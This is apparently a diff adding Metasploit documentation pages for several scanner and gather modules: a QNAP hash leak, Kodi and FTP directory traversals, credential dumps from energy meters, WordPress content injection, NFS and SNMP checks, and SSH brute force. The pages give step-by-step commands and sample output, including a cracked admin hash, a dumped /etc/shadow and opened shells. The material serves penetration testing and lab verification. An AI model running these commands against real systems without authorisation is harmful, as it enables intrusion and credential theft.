Set this option to a value where you don't see a backtrace. Set this
higher if you're not sure. Default is 5000.
**RETRIES**
Sometimes the attack won't be successful on the first run. This option
controls how many times to retry the attack. Default is 10.
**VERBOSE**
This will tell you how long the binary search took and how many requests
were sent during exploitation. Default is false.
## Usage
Let's run through a successful exploitation. I've tailored the options
to my target. Your target may differ.
```
msf > use auxiliary/gather/qnap_backtrace_admin_hash
msf auxiliary(qnap_backtrace_admin_hash) > set rhost [redacted]
rhost => [redacted]
msf auxiliary(qnap_backtrace_admin_hash) > set offset_end 3000
offset_end => 3000
msf auxiliary(qnap_backtrace_admin_hash) > set verbose true
verbose => true
msf auxiliary(qnap_backtrace_admin_hash) > run
[*] QNAP [redacted] detected
[*] Binary search of 2000-3000 completed in 5.02417s
[*] Admin hash found at 0x8068646 with offset 2920
[+] Hopefully this is your hash: $1$$vnSTnHkIF96nN6kxQkZrf.
[*] 11 HTTP requests were sent during module run
[*] Auxiliary module execution completed
msf auxiliary(qnap_backtrace_admin_hash) >
```
We got lucky on this run. Sometimes it takes a couple retries to get the
hash. Now what do we do with it...
```
wvu@kharak:~$ john --wordlist --rules --format=md5crypt shadow
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 SSSE3 20x])
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter2 (admin)
1g 0:00:00:01 DONE (2017-03-15 04:41) 0.8928g/s 24839p/s 24839c/s
24839C/s flipper2..mercury2
Use the "--show" option to display all of the cracked passwords reliably
Session completed
wvu@kharak:~$
```
Cracked! Now you can log in to the device. Shells await!
## Addendum
I used this `curl` command to test for offsets:
```
curl -kv "https://[redacted]/cgi-bin/cgi.cgi?u=admin&p=$(perl -e 'print "A"x2000' | base64 -w 0)"
```

27
documentation/modules/auxiliary/scanner/ftp/easy_file_sharing_ftp.md Normal file
View File

@ -0,0 +1,27 @@
This module exploits a directory traversal vulnerability in Easy File Sharing FTP Server 3.6, or
prior. It abuses the RETR command in FTP in order to retrieve a file outside the shared directory.
By default, anonymous access is allowed by the FTP server.
## Vulnerable Application
Easy File Sharing FTP Server version 3.6 or prior should be affected. You can download the
vulnerable application from the official website:
http://www.efssoft.com/efsfs.exe
## Options
Since the FTP server allows anonymous access, by default, you only need to configure:
**RHOSTS**
The FTP server IP address.
**PATH**
The file you wish to download. Assume this path starts from C:\
## Demonstration
![ftp](https://cloud.githubusercontent.com/assets/1170914/23971054/4fdc2b08-099a-11e7-88ea-67a678628e49.gif)

33
documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md Normal file
View File

@ -0,0 +1,33 @@
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/binom3_login_config_pass_dump```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
```
msf > use auxiliary/scanner/http/binom3_login_config_pass_dump
msf auxiliary(binom3_login_config_pass_dump) > set rhosts 1.3.3.7
msf auxiliary(binom3_login_config_pass_dump) > run
[+] 1.3.3.7:80 - Binom3 confirmed...
[*] 1.3.3.7:80 - Trying username:"root" with password:"root"
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "root":"root"
[+] ++++++++++++++++++++++++++++++++++++++
[+] 1.3.3.7 - dumping configuration
[+] ++++++++++++++++++++++++++++++++++++++
[+] 1.3.3.7:80 - File retrieved successfully!
[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000003_moduletest_1.3.3.7_Binom3_config_165927.txt
[+] ++++++++++++++++++++++++++++++++++++++
[+] 1.3.3.7 - dumping password file
[+] ++++++++++++++++++++++++++++++++++++++
[+] 1.3.3.7:80 - File retrieved successfully!
[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000004_moduletest_1.3.3.7_Binom3_passw_010954.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

36
documentation/modules/auxiliary/scanner/http/gavazzi_em_login_loot.md Normal file
View File

@ -0,0 +1,36 @@
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication.
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
Vulnerable firmware versions include:
VMU-C EM prior to firmware Version A11_U05
VMU-C PV prior to firmware Version A17.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/gavazzi_em_login_loot```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
```
msf > use auxiliary/scanner/http/gavazzi_em_login_loot
msf auxiliary(gavazzi_em_login_loot) > set rhosts 1.3.3.7
msf auxiliary(gavazzi_em_login_loot) > set rport 80
msf auxiliary(gavazzi_em_login_loot) > run
[+] 1.3.3.7:80 - [1/1] - Running Carlo Gavazzi VMU-C Web Management portal...
[*] 1.3.3.7:80 - [1/1] - Trying username:"admin" with password:"admin"
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "admin":"admin"
[+] 1.3.3.7:80 - Firmware version A8_U03...
[+] 1.3.3.7:80 - SMTP server: "", SMTP username: "", SMTP password: ""
[*] 1.3.3.7:80 - dumping EWplant.db
[+] 1.3.3.7:80 - EWplant.db retrieved successfully!
[+] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000005_moduletest_1.3.3.7_EWplant.db_501578.db
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

41
documentation/modules/auxiliary/scanner/http/kodi_traversal.md Normal file
View File

@ -0,0 +1,41 @@
## Vulnerable Application
This module exploits an arbitrary file disclosure vulnerability in Kodi before 17.1.
**Vulnerable Application Installation Steps**
Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
you're lazy, like the [one for the Rpi2](http://releases.libreelec.tv/LibreELEC-RPi2.arm-7.0.3.img.gz),
or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).
You'll need a version lower than 17.1 of Kodi.
## Verification Steps
A successful run of the exploit will look like this:
```
msf > use auxiliary/scanner/http/kodi_traversal
msf auxiliary(kodi_traversal) > set RPORT 8080
RPORT => 8080
msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31
RHOSTS => 192.168.0.31
msf auxiliary(kodi_traversal) > set FILE /etc/shadow
FILE => /etc/shadow
msf auxiliary(kodi_traversal) > run
[*] Reading '/etc/shadow'
[+] /etc/shadow stored as '/home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(kodi_traversal) > cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin
[*] exec: cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin
systemd-network:*:::::::
root:$6$ktSJvEl/p.r7nsR6$.EZhW6/TPiY.7qz.ymYSreJtHcufASE4ykx7osCfBlDXiEKqXoxltsX5fE0mY.494pJOKyuM50QfpLpNKvAPC.:::::::
nobody:*:::::::
dbus:*:::::::
system:*:::::::
sshd:*:::::::
avahi:*:::::::
```

24
documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md Normal file
View File

@ -0,0 +1,24 @@
Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/meteocontrol_weblog_extractadmin```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
```
msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin
msf auxiliary(meteocontrol_weblog_extractadmin) > set rhosts 1.2.3.4
msf auxiliary(meteocontrol_weblog_extractadmin) > run
[+] 1.2.3.4:8080 - Running Meteocontrol WEBlog management portal...
[*] 1.2.3.4:8080 - Attempting to extract Administrator password...
[+] 1.2.3.4:8080 - Password is password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

45
documentation/modules/auxiliary/scanner/http/wordpress_content_injection.md Normal file
View File

@ -0,0 +1,45 @@
**Feature description:**
This adds a module for the WordPress [4.7](https://wordpress.org/wordpress-4.7.tar.gz)/[4.7.1](https://wordpress.org/wordpress-4.7.1.tar.gz)
content injection vulnerability detailed at
https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html.
**Verification steps:**
- [ ] Download https://wordpress.org/wordpress-4.7.1.tar.gz
- [ ] `tar xf wordpress-4.7.1.tar.gz -C /var/www/html --no-same-owner`
- [ ] Prevent auto-update with either:
1. [ ] Ensure the install dir is not writable by the web user
2. [ ] Add the following to `wp_config.php` (after install)
```
define( 'WP_AUTO_UPDATE_CORE', false );
define( 'AUTOMATIC_UPDATER_DISABLED', true );
```
- [ ] Install Wordpress
- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/http/wordpress_content_injection`
- [ ] Set `rhost`, `rport` and `TARGETURI`
- [ ] Set `ACTION` to either `LIST` or `UPDATE`
- [ ] Set `POST_ID` and `POST_TITLE`, `POST_CONTENT`, and/or `POST_PASSWORD`
- [ ] Run the module
**Sample run:**
This is just the `LIST` action...
```
msf auxiliary(wordpress_content_injection) > run
[*] REST API found in HTML document
Posts at https://[redacted]:443/ (REST API: /wp-json/wp/v2)
============================================================
ID Title URL Password
-- ----- --- --------
1 Hello world! https://[redacted]/2016/10/hello-world/ No
87 Hello world! https://[redacted]/2016/08/hello-world-2/ No
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_content_injection) >
```

136
documentation/modules/auxiliary/scanner/misc/sunrpc_portmapper.md Normal file
View File

@ -0,0 +1,136 @@
## Vulnerable Application
RPC Portmapper, or more recently renamed to rpcbind, is fairly common and this scanner searches for its existance. The idea behind rpcbind was to create a
'directory' that could be asked where a service is running (port). Having this single port/service be queryable meant, the services being managed by rpcbind
could actually be running on any port or protocol, and rpdbind would be in charge of letting clients know where they were. This is more or less an outdated
model/service, and NFS is arguably the most popular service still utilizing rpcbind. The following was done on Kali linux:
1. Install rpcbind: `apt-get install rpcbind`
2. Now now have `rpcbind`, but this gives us minimal services running on it. You may want to install additional:
* NIS: `apt-get install nis`
* Start the service: `ypserv`
* NFS: `apt-get install nfs-kernel-server`
3. Just to be safe, restart rpcbind: `service rpcbind restart`
## Verification Steps
1. Install and configure rpcbind
2. Start msfconsole
3. Do: `use auxiliary/scanner/misc/sunrpc_portmapper`
4. Do: `run`
## Scenarios
A run against the configuration from these docs
```
msf > use auxiliary/scanner/misc/sunrpc_portmapper
msf auxiliary(sunrpc_portmapper) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(sunrpc_portmapper) > run
[+] 127.0.0.1:111 - SunRPC Programs for 127.0.0.1
=============================
Name Number Version Port Protocol
---- ------ ------- ---- --------
mountd 100005 1 60153 udp
mountd 100005 1 39027 tcp
mountd 100005 2 47725 udp
mountd 100005 2 53055 tcp
mountd 100005 3 49015 udp
mountd 100005 3 47033 tcp
nfs 100003 3 2049 tcp
nfs 100003 4 2049 tcp
nfs 100003 3 2049 udp
nfs 100003 4 2049 udp
nfs_acl 100227 3 2049 tcp
nfs_acl 100227 3 2049 udp
nlockmgr 100021 1 40970 udp
nlockmgr 100021 3 40970 udp
nlockmgr 100021 4 40970 udp
nlockmgr 100021 1 42279 tcp
nlockmgr 100021 3 42279 tcp
nlockmgr 100021 4 42279 tcp
rpcbind 100000 4 111 tcp
rpcbind 100000 3 111 tcp
rpcbind 100000 2 111 tcp
rpcbind 100000 4 111 udp
rpcbind 100000 3 111 udp
rpcbind 100000 2 111 udp
ypserv 100004 2 707 udp
ypserv 100004 1 707 udp
ypserv 100004 2 708 tcp
ypserv 100004 1 708 tcp
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
## Confirming
Since rpc port mapper has been around since 1995, there are many tools which can also query it.
The following are other industry tools which can also be used.
### [nmap](https://nmap.org/nsedoc/scripts/rpcinfo.html)
```
nmap -p 111 --script=rpcinfo 127.0.0.1
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-13 22:57 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000043s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/udp nfs
| 100004 1,2 707/udp ypserv
| 100004 1,2 708/tcp ypserv
| 100005 1,2,3 47033/tcp mountd
| 100005 1,2,3 49015/udp mountd
| 100021 1,3,4 40970/udp nlockmgr
| 100021 1,3,4 42279/tcp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
```
### rpcinfo
This is the standard package included with rpcbind to query the rpc interface.
```
rpcinfo -p 127.0.0.1
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100005 1 udp 60153 mountd
100005 1 tcp 39027 mountd
100005 2 udp 47725 mountd
100005 2 tcp 53055 mountd
100005 3 udp 49015 mountd
100005 3 tcp 47033 mountd
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 3 tcp 2049
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100227 3 udp 2049
100021 1 udp 40970 nlockmgr
100021 3 udp 40970 nlockmgr
100021 4 udp 40970 nlockmgr
100021 1 tcp 42279 nlockmgr
100021 3 tcp 42279 nlockmgr
100021 4 tcp 42279 nlockmgr
100004 2 udp 707 ypserv
100004 1 udp 707 ypserv
100004 2 tcp 708 ypserv
100004 1 tcp 708 ypserv
```

113
documentation/modules/auxiliary/scanner/nfs/nfsmount.md Normal file
View File

@ -0,0 +1,113 @@
## Vulnerable Application
NFS is very common, and this scanner searches for a mis-configuration, not a vulnerable software version. Installation instructions for NFS can be found for every operating system.
The [Ubuntu 14.04](https://help.ubuntu.com/14.04/serverguide/network-file-system.html) instructions can be used as an example for installing and configuring NFS. The
following was done on Kali linux:
1. `apt-get install nfs-kernel-server`
2. Create 2 folders to share:
```
mkdir /tmp/open_share
mkdir /tmp/closed_share
```
3. Add them to the list of shares:
```
echo "/tmp/closed_share 10.1.2.3(ro,sync,no_root_squash)" >> /etc/exports
echo "/tmp/open_share *(rw,sync,no_root_squash)" >> /etc/exports
```
4. Restart the service: `service nfs-kernel-server restart`
In this scenario, `closed_share` is set to read only, and only mountable by the IP 10.1.2.3. `open_share` is mountable by anyone (`*`) in read/write mode.
## Verification Steps
1. Install and configure NFS
2. Start msfconsole
3. Do: `use auxiliary/scanner/nfs/nfsmount`
4. Do: `run`
## Scenarios
A run against the configuration from these docs
```
msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(nfsmount) > run
[+] 127.0.0.1:111 - 127.0.0.1 NFS Export: /tmp/open_share [*]
[+] 127.0.0.1:111 - 127.0.0.1 NFS Export: /tmp/closed_share [10.1.2.3]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Another example can be found at this [source](http://bitvijays.github.io/blog/2016/03/03/learning-from-the-field-basic-network-hygiene/):
```
[*] Scanned 24 of 240 hosts (10% complete)
[+] 10.10.xx.xx NFS Export: /data/iso [0.0.0.0/0.0.0.0]
[*] Scanned 48 of 240 hosts (20% complete)
[+] 10.10.xx.xx NFS Export: /DataVolume/Public [*]
[+] 10.10.xx.xx NFS Export: /DataVolume/Download [*]
[+] 10.10.xx.xx NFS Export: /DataVolume/Softshare [*]
[*] Scanned 72 of 240 hosts (30% complete)
[+] 10.10.xx.xx NFS Export: /var/ftp/pub [10.0.0.0/255.255.255.0]
[*] Scanned 96 of 240 hosts (40% complete)
[+] 10.10.xx.xx NFS Export: /common []
```
## Confirming
Since NFS has been around since 1989, with modern NFS(v4) being released in 2000, there are many tools which can also be used to verify this configuration issue.
The following are other industry tools which can also be used.
### [nmap](https://nmap.org/nsedoc/scripts/nfs-showmount.html)
```
nmap -p 111 --script=nfs-showmount 127.0.0.1
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-12 19:41 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000037s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
| /tmp/open_share *
|_ /tmp/closed_share 10.1.2.3
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
```
### [showmount](https://packages.debian.org/sid/amd64/nfs-common/filelist)
showmount is a part of the `nfs-common` package for debian.
```
showmount -e 127.0.0.1
Export list for 127.0.0.1:
/tmp/open_share *
/tmp/closed_share 10.1.2.3
```
## Exploitation
Exploiting this mis-configuration is trivial, however exploitation doesn't necessarily give access (command execution) to the system.
If a share is mountable, ie you either are the IP listed in the filter (or could assume it through a DoS), or it is open (*), mounting is trivial.
The following instructions were written for Kali linux.
1. Create a new directory to mount the remote volume to: `mkdir /mnt/remote`
2. Use `mount` to link the remote volume to the local folder: `mount -t nfs 127.0.0.1:/tmp/open_share /mnt/remote`
The mount and its writability can now be tested:
1. Write a file: `echo "hello" > /mnt/remote/test`
2. The remote end now has the file locally:
```
cat /tmp/open_share/test
hello
```
1. To unmount: `umount /mnt/remote`
At this point, its time to hope for a file of value. Maybe code with hardcoded credentials, a `passwords.txt`, or an `id_rsa`.

94
documentation/modules/auxiliary/scanner/snmp/snmp_login.md Normal file
View File

@ -0,0 +1,94 @@
## Vulnerable Application
Installation instructions for SNMP server can be found for every operating system.
The [Ubuntu 14.04](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-an-snmp-daemon-and-client-on-ubuntu-14-04) instructions can be used as an example for installing and configuring NFS. The
following was done on Kali linux:
1. `sudo apt-get install snmpd`
2. Set SNMP to listen on non-localhost: `nano /etc/snmp/snmpd.conf`
```
# Listen for connections from the local system only
#agentAddress udp:127.0.0.1:161
# Listen for connections on all interfaces (both IPv4 *and* IPv6)
agentAddress udp:161,udp6:[::1]:161
```
3. Restart the service: `service snmpd restart`
### SNMP Versions
SNMP has 3 main versions.
* **1**, **2c**: both use simple password protection (string), and are often defaulted to `public` (read only), and `private` (read/write). Version 2 is backwards compatible with version 1. This is a plaintext protocol and is vulenrable to being intercepted.
* **3**: has several security levels and is significantly more complex, but also not covered in this module.
## Verification Steps
1. Install and configure SNMP
2. Start msfconsole
3. Do: `use auxiliary/scanner/snmp/snmp_login`
4. Do: `run`
## Scenarios
A run against the configuration from these docs
```
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(snmp_login) > run
[!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Linux hostname 4.9.0-kali1-amd64 #1 SMP Debian 4.9.6-3kali2 (2017-01-30) x86_64
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Another example can be found at this [source](http://bitvijays.github.io/blog/2016/03/03/learning-from-the-field-basic-network-hygiene/):
```
[+] 10.4.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Cisco IOS Software, C1130 Software (C1130-K9W7-M), Version 12.4(10b)JA, RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Wed 24-Oct-07 15:17 by prod_rel_team
[*] Scanned 12 of 58 hosts (20% complete)
[*] Scanned 18 of 58 hosts (31% complete)
[+] 10.10.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Digi Connect ME Version 82000856_F6 07/21/2006
[+] 10.10.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Digi Connect ME Version 82000856_F6 07/21/2006
[*] Scanned 24 of 58 hosts (41% complete)
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: private (Access level: read-write); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: private (Access level: read-write); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: private (Access level: read-write); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[*] Scanned 29 of 58 hosts (50% complete)
[*] Scanned 35 of 58 hosts (60% complete)
[*] Scanned 41 of 58 hosts (70% complete)
[*] Scanned 47 of 58 hosts (81% complete)
[+] 10.25.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Digi Connect ME Version 82000856_F6 07/21/2006
```
## Confirming
Since SNMP has been around for quite a while, there are many tools which can also be used to verify this configuration issue.
The following are other industry tools which can also be used.
### [nmap](https://nmap.org/nsedoc/scripts/snmp-info.html)
```
nmap -p 161 -sU --script=snmp-info 127.0.0.1
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-12 23:00 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00017s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 54ad55664725a15800000000
| snmpEngineBoots: 2
|_ snmpEngineTime: 31m30s
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
```

199
documentation/modules/auxiliary/scanner/ssh/ssh_login.md Normal file
View File

@ -0,0 +1,199 @@
## SSH Service
SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level. SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
This module attempts to login to SSH with username and password combinations. For public/private SSH keys, please use `auxiliary/scanner/ssh/ssh_login_pubkey`.
It should be noted that some modern Operating Systems have default configurations to not allow the `root` user to remotely login via SSH, or to only allow `root` to login with an SSH key login.
## Verification Steps
1. Install SSH and start it.
2. Start msfconsole
3. Do: ` use auxiliary/scanner/ssh/ssh_login`
4. Do: `set rhosts`
5. Do: set usernames and passwords via any of the available options
5. Do: `run`
6. You will hopefully see something similar to, followed by a session:
````[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '```
## Options
**BLANK_PASSWORD**
Boolean value on if an additional login attempt should be attempted with an empty password for every user.
**PASSWORD**
Password to try for each user.
**PASS_FILE**
A file containing a password on every line. Kali linux example: `/usr/share/wordlists/metasploit/password.lst`
**RHOSTS**
Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line. File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
**STOP_ON_SUCCESS**
If a valid login is found on a host, immediately stop attempting additional logins on that host.
**USERNAME**
Username to try for each password.
**USERPASS_FILE**
A file containing a username and password, separated by a space, on every line. An example line would be `username password`
**USER_AS_PASS**
Boolean value on if an additional login attempt should be attempted with the password as the username.
**USER_FILE**
A file containing a username on every line.
**VERBOSE**
Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `PASS_FILE`s are used. A failed attempt will look similar to the following:
```
[-] SSH - Failed: 'msfadmin:virtual'
```
## Option Combinations
It is important to note that usernames and passwords can be entered in multiple combinations. For instance, a password could be set in `PASSWORD`, be part of either `PASS_FILE` or `USERPASS_FILE`, be guessed via `USER_AS_PASS` or `BLANK_PASSWORDS`.
This module makes a combination of all of the above when attempting logins. So if a password is set in `PASSWORD`, and a `PASS_FILE` is listed, passwords will be generated from BOTH of these.
## Scenarios
Example run against:
* Ubuntu 14.04 Server with root login permitted: 192.168.2.156
* Ubuntu 16.04 Server: 192.168.2.137
* Metasploitable: 192.168.2.46
* Metasploitable 2: 192.168.2.35
```
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > cat /root/ssh_passwords.lst
[*] exec: cat /root/ssh_passwords.lst
msfadmin
badpassword
root
ubuntu
msf auxiliary(ssh_login) > set pass_file /root/ssh_passwords.lst
pass_file => /root/ssh_passwords.lst
msf auxiliary(ssh_login) > cat /root/ssh_un.lst
[*] exec: cat /root/ssh_un.lst
msfadmin
badpassword
root
ubuntu
msf auxiliary(ssh_login) > set user_file /root/ssh_un.lst
user_file => /root/ssh_un.lst
msf auxiliary(ssh_login) > cat /root/ssh_hosts.lst
[*] exec: cat /root/ssh_hosts.lst
192.168.2.156
192.168.2.137
192.168.2.35
192.168.2.46
msf auxiliary(ssh_login) > set rhosts file://root/ssh_hosts.lst
rhosts => file://root/ssh_hosts.lst
msf auxiliary(ssh_login) > set verbose false
verbose => false
msf auxiliary(ssh_login) > set threads 4
threads => 4
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[*] SSH - Starting bruteforce
[*] SSH - Starting bruteforce
[*] SSH - Starting bruteforce
[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 5 opened (192.168.2.117:44415 -> 192.168.2.46:22) at 2017-02-22 20:26:13 -0500
[*] Command shell session 6 opened (192.168.2.117:36107 -> 192.168.2.35:22) at 2017-02-22 20:26:13 -0500
[+] SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 7 opened (192.168.2.117:32829 -> 192.168.2.156:22) at 2017-02-22 20:26:35 -0500
[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 8 opened (192.168.2.117:42205 -> 192.168.2.156:22) at 2017-02-22 20:26:42 -0500
[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 9 opened (192.168.2.117:37027 -> 192.168.2.137:22) at 2017-02-22 20:26:44 -0500
[*] Scanned 3 of 4 hosts (75% complete)
[*] Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
5 shell /linux SSH msfadmin:msfadmin (192.168.2.46:22) 192.168.2.117:44415 -> 192.168.2.46:22 (192.168.2.46)
6 shell /linux SSH msfadmin:msfadmin (192.168.2.35:22) 192.168.2.117:36107 -> 192.168.2.35:22 (192.168.2.35)
7 shell /linux SSH root:ubuntu (192.168.2.156:22) 192.168.2.117:32829 -> 192.168.2.156:22 (192.168.2.156)
8 shell /linux SSH ubuntu:ubuntu (192.168.2.156:22) 192.168.2.117:42205 -> 192.168.2.156:22 (192.168.2.156)
